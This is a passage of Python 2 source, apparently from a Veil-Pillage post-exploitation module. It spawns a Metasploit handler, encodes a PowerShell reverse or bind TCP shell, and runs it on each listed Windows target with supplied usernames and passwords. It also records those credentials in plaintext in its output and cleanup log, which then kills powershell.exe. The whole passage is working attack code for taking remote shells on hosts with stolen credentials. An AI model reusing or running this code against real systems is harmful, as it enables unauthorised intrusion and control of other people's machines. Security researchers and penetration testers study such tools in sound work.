                # fixed literal, so no option value reaches the shell line.
                cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\""
                # invoke msfconsole with the handler script in a new tab
                os.system(cmd)
                # blocks until the operator confirms the handler is up
                raw_input("\n\n [>] Press enter when handler is ready: ")

        # bind_tcp shell is easier :)
        elif shell.lower() == "bind_tcp":
            triggerCMD = helpers.encPowershell(bindTCPShell)
        else:
            print helpers.color("\n [!] Shell not recognized: please enter rev_tcp or bind_tcp\n", warning=True)
            raw_input("\n [>] Press enter to continue: ")
            return ""

        # execute the powershell trigger command on each target
        # (triggerCMD is always bound here: both non-returning branches set it)
        for target in self.targets:
            # trigger the command and set output as appropriate
            # lhost is echoed even for bind_tcp, where it may still be "none".
            print "\n [*] Triggering powershell shell '"+shell.lower()+"' with lhost="+lhost+" and lport="+lport+" on "+target
            # NOTE: the output line embeds the plaintext password.
            self.output += "[*] Triggering powershell shell '"+shell.lower()+"' with lhost="+lhost+" and lport="+lport+" using creds '"+username+":"+password+"' on "+target+"\n"
            command_methods.executeCommand(target, username, password, triggerCMD, triggerMethod)

            # build our cleanup file -> kill all powershell processes
            # Record format: executeCommand|target|user|pass|cmd|method --
            # presumably parsed by the framework's cleanup runner; it too
            # carries the plaintext password.
            killCMD = "taskkill /f /im powershell.exe"
            self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+killCMD+"|"+triggerMethod+"\n"